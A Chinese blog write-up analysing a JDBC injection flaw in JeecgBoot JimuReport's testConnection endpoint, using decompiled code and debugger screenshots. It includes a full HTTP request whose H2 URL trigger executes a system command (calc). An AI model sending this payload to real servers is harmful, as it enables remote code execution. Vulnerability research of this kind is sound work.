当前位置: 首页 > news >正文

网站后台维护怎么做优质的做pc端网站

news 2025/11/6 23:44:17
网站后台维护怎么做,优质的做pc端网站,网站百度手机端排名怎么查询,专题网站建设意义何在首先找testConnection接口,前面进行了jimureport-spring-boot-starter-1.5.8.jar反编译查找,接口找到发现请求参数是json var1是JmreportDynamicDataSourceVo类型,也就是如上图的dbSource,根据打印的结果可以知道这里是local cac…

首先找testConnection接口,前面进行了jimureport-spring-boot-starter-1.5.8.jar反编译查找,接口找到发现请求参数是json
在这里插入图片描述
var1是JmreportDynamicDataSourceVo类型,也就是如上图的dbSource,根据打印的结果可以知道这里是local cache key
ConcurrentHashMap属于并发程序,var4也就是连接相关的东西
那么这一块就是数据库连接的东西,主要说的是配置文件
因为jeecg-boot/jmreport/testConnection接口的参数是var1,是JmreportDynamicDataSourceVo类型,那么我们查看代码总结出来有这么几个参数id,code,dbType,dbDriver,dbUrl,dbName,dbUsername,dbPassword,connectTimes

那么继续往下走在这里插入图片描述
可以看到从var1(也就是JmreportDynamicDataSourceVo)中获得DbDriver,然后获得DbUrl,一起通过g方法传给了var39,来看看g方法在这里插入图片描述
这段代码的目的是用于处理包含数据库连接参数的字符串,如果字符串中包含 “mysql”,则将 “allowLoadLocalInfile” 参数设置为 “false”。这是为了增强安全性,因为允许加载本地文件可能存在一些潜在的安全风险

var2 = DriverManager.getConnection(var39, var1.getDbUsername(), var1.getDbPassword());

回到上一层,继续往下走,var2是进行数据库连接(dburl,username,password),那么记下来就是if判断var是否为null

但是上面是我们反编译出的jar包和实际还是有差别,进行动态调试看看
现在对传入的 HTTP 请求执行预处理的拦截器地方下断点,因为必经过这里
在这里插入图片描述
然后往下跳,在接口处下断点在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到为false,所以进入下面1091行的else
在这里插入图片描述
可以看到连接时候直接执行命令,弹出计算器
在这里插入图片描述
然后回显报错,这里会想到为什么会跳入这个catch (Exception var35)呢
因为执行的命令用于连接会报异常,catch (ClassNotFoundException var34) 块用于捕获ClassNotFoundException异常,而Exception var35用于捕获所有的异常

payload

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 363{"id": "1","code": "dataSource1","dbType": "H2","dbDriver": "org.h2.Driver","dbUrl": "jdbc:h2:mem:test;init=CREATE TRIGGER shell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('calc')\u000A$$","dbName": "test","dbUsername": "sa","dbPassword": "","connectTimes": 5
}

在这里插入图片描述
目前是本地h2数据库没有配置好,并且idea没有配置h2的依赖
我们配置好如下
在这里插入图片描述
在idea中加入h2依赖

<!--h2-->
<dependency><groupId>com.h2database</groupId><artifactId>h2</artifactId><version>1.4.197</version><scope>runtime</scope>
</dependency>

根据我们之前写的h2文章,就是因为所在版本存在漏洞1.1.100 <= H2 Console <= 2.0.204
在这里插入图片描述
在这里插入图片描述
成功弹出计算器

http://www.yayakq.cn/news/557642/

相关文章:

  • 办网站流程赤峰市做网站
  • 2003系统做网站如何制造公司网址
  • 自住房车各项建设部网站女孩做网站合适吗
  • 网站本地环境搭建软件苏州定制型网站建设
  • 什么网站做污水处理药剂的好广告模板制作
  • 桂林旅游网站wordpress标题去重
  • 咨询北京国互网网站建设站酷网官网进入
  • 网上接手袋做是哪一个网站上海外贸公司最新招聘
  • 手表哪个网站做的好建设银行企业网银缴费
  • 乡村旅游网站建设的意义个人持有域名可以做公司网站吗
  • 如何创网站自助网站
  • 男女情感类网站现在网站尺寸
  • 淘宝客推广网站建设设计微信小程序
  • asp.net 网站开发视频2003网站的建设
  • 惠州高端模板建站做集群网站
  • 合肥建设工程招聘信息网站wordpress 数据库函数
  • 网站建设论坛fantodo天津网站建设信息科技有限公司
  • 郑州网站推广哪家效果好口碑营销案例简短
  • 律师网站设计中学生做网站的软件
  • wordpress上传图片路径修改企业网站优化公司有哪些
  • 企业建站公司是干嘛的巩义网站优化技巧
  • 嘉兴网站seo公司广州网站开发网络公司
  • 营销型网站建设区别如何注册网络公司
  • 成都网站制作公司 dedecms网站建设 中企动力板材生态板
  • 深圳做网站哪里最好做网站的服务器有哪些
  • 代做网站app朝阳凌源网站建设
  • 建站网站怎么上传代码网站友情链接怎么样做
  • dedecms生成xml网站地图做产品推广什么网站会比较好
  • 上海网站建设公司网站建设如何登录网站空间
  • vs2013做的网站可拖拽建设网站没有了吗